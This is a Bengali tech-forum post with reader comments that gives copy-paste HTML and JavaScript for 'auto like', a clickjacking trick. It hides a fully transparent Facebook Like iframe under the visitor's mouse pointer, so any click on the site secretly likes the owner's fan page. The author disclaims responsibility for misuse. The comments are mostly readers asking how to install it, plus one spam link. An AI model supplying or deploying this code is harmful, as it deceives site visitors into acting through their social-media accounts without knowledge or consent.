ভাইয়া, আপনি কি শিরোনাম দেখে অবাক হয়েছেন? অবাক হলেও এটা সত্যি! এখন থেকে যেই আপনার ওয়েবসাইটে যাবে, সেই আপনার সাইটের ফেসবুক ফ্যান পেজে লাইক মারবে! অর্থাৎ অটো লাইক!!
এটি কারো ক্ষতির উদ্দেশে ব্যবহার করলে টিউনার দায়ী নয়।
JQuery plugin
প্রথমে এটা ডাউনলোড করেন আপনার ওয়েবসাইটে (No other version!): http://code.jquery.com/jquery-1.4.2.min.js
ব্লগস্পট ভাইরা প্রথমে ডেশ বোর্ড এ গিয়ে টেম্পলেতে যান। এবার Edit html এ গিয়ে <body> এর ঠিক আগে নিচের টা পেস্ট করেন। (যাদের ইন্সটল নেই)
<style type="text/css">
/* jQuery lightBox plugin - Gallery style */
#gallery {
background-color: #444;
padding: 10px;
width: 520px;
}
#gallery ul { list-style: none; }
#gallery ul li { display: inline; }
#gallery ul img {
border: 5px solid #3e3e3e;
border-width: 5px 5px 20px;
}
#gallery ul a:hover img {
border: 5px solid #fff;
border-width: 5px 5px 20px;
color: #fff;
}
#gallery ul a:hover { color: #fff; }
</style><script src="http://dinhquanghuy.110mb.com/lightbox/jquery.lightbox-0.5.js" type="text/javascript"/>
<link href="http://dinhquanghuy.110mb.com/lightbox/jquery.lightbox-0.5.css" media="screen" rel="stylesheet" type="text/css"/>
<script type="text/javascript">
$(function() {
$('a[rel*=lightbox]').lightBox();
});
</script>
যাদের আগের ভার্সন ইন্সটল আছে তারা প্রথমে ব্লগারে লগইন করেন। এবার Blog সিলেক্ট করে টেম্পলেটে যান। Edit HTML এ যান। ctrl+f চাপুন। https://ajax.googleapis.com/ajax/libs/jquery/ লিখে সার্চ করুন। যে রেজাল্ট আসবে এতে গিয়ে jquery/ এর পর যা আছে মুছে দিয়ে 1.4.2 লিখুন। রেজাল্ট না আসলে ১ নং পদ্ধতি অবলম্বন করুন।
Main code (All type of website)
এরপর header section এ <title></title> এর ঠিক নিচে এই কোডটি পেস্ট করেনঃ
<script src=”jquery-1.4.2.min.js” type=”text/javascript”></script>
<script type=”text/javascript”>
var interval;
$(function()
{
interval=setInterval(“updateActiveElement();”, 50);
});
function updateActiveElement()
{
if ( $(document.activeElement).attr(‘id’)==”fbframe” )
{
clearInterval(interval);
iflag=1;
}
}
</script>
এবার footer section এ </body></html> এর ঠিক আগে এই কোড টা পেস্ট করেন
<div style=”overflow: hidden; width: 10px; height: 12px; position: absolute; filter:alpha(opacity=0); -moz-opacity:0.0; -khtml-opacity: 0.0; opacity: 0.0;” id=”icontainer”>
<!–facebook like frame code goes here–>
<iframe src=”http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fpages/Pctips20tk/379492948785939%2F&layout=standard&show_faces=false&width=450&action=like&font=tahoma&colorscheme=light&height=80″ scrolling=”no” frameborder=”0″ style=”border:none; overflow:hidden; width:50px; height:23px;” allowTransparency=”true” id=”fbframe” name=”fbframe”></iframe>
<!–end facebook like frame code–>
</div>
<script>
var iflag = 0;
var icontainer = document.getElementById(‘icontainer’);
var standardbody=(document.compatMode==”CSS1Compat”)? document.documentElement : document.body //create reference to common “body” across doctypes
function mouseFollower(e){
/* DO NOT EDIT THIS */
if (window.event)
{ // for IE
icontainer.style.top = (window.event.y-5)+standardbody.scrollTop+’px’;
icontainer.style.left = (window.event.x-5)+standardbody.scrollLeft+’px’;
}
else
{
icontainer.style.top = (e.pageY-5)+’px’;
icontainer.style.left = (e.pageX-5)+’px’;
}
}
document.onmousemove = function(e) {
if (iflag == 0) {mouseFollower(e);}
}
</script>
এখানে pages/Pctips20tk/379492948785939 এর জায়গায় আপনার পেজের লিঙ্ক দেন।
এবার দেখেন মজা! তবে মনে রাখবেন, এটার অপব্যবহারের জন্য টিউনার দায়ী নয়!
ভালো লাগলে কমেন্ট করবেন
"Not tested in blogger but tested with wordpress and Joomla."




32 


rajon3430
how to download the http://code.jquery.com/jquery-1.4.2.min.js in my blog?
KiNG
@rajon3430: আপনার সাইট কি দিয়ে তৈরি? Blogger/wordpress/joomla or other?
nazim01919
Free Automatic Backlink Exchange
http://link.fullbdtube.com/
carifahmad
কোড টা কি দুই টাইটেলের মাঝে বসাবো??
KiNG
@carifahmad: আপনার সাইট কি দিয়ে তৈরি? Blogger/wordpress/joomla or other?
carifahmad
@KiNG: blogger er freeeeeee blog
KiNG
@carifahmad: If that follow above the post.
rajon3430
@KiNG: blogger
KiNG
@rajon3430: now see!
KiNG
@carifahmad: আপনার এভাস্ট এর মাথা নষ্ট
kingofmadness
doya kore bolben ki aita blogger er blog e kivabe kaj kore. teambots
KiNG
@kingofmadness: bro, go to template of ur blogger menu. now click edit HTML. Now find words with Ctrl+f. Now follow above.
kingofmadness
@carifahmad bujlam edit html e jabo kintu ctrl+f press kore kon sobdo ta find out korbo uporeto apni akta download link disen r niche 2ta code disen. download link ta to kono kaj kore na. vai tune ta aktu describe koren please
KiNG
@kingofmadness: এখন দেখেন
kingofmadness
@KiNG bujlam na
rajon3430
can any one help me to download http://code.jquery.com/jquery-1.4.2.min.js in blogspot?
KiNG
@rajon3430: http://www.facebook.com/pages/Pctips20tk/379492948785939?ref=stream%C2%A0%E0%A6%B2%E0%A6%BF%E0%A6%99%E0%A7%8D%E0%A6%95%E0%A7%87 লিঙ্কে গিয়ে পোস্ট টা পড়েন।
rajon3430
@KiNG: there is nothing but the code. but how can i download the code in my blog spot? please tell me teh steps
KiNG
@rajon3430: পোস্ট আপডেট করা হল।
siddique
how i l do it by joomla??
মোঃ আবুল বাশার
আমার সাইটটি ওয়ার্ডপ্রেস থেকে তৈরী তাহলে কি ভাবে করব?
nir
blolspot a ai lekha astece……
We were unable to save your template
Please correct the error below, and submit your template again.
Your template could not be parsed as it is not well-formed. Please make sure all XML elements are closed properly.
XML error message: Open quote is expected for attribute “{1}” associated with an element type “src”.
কি করব?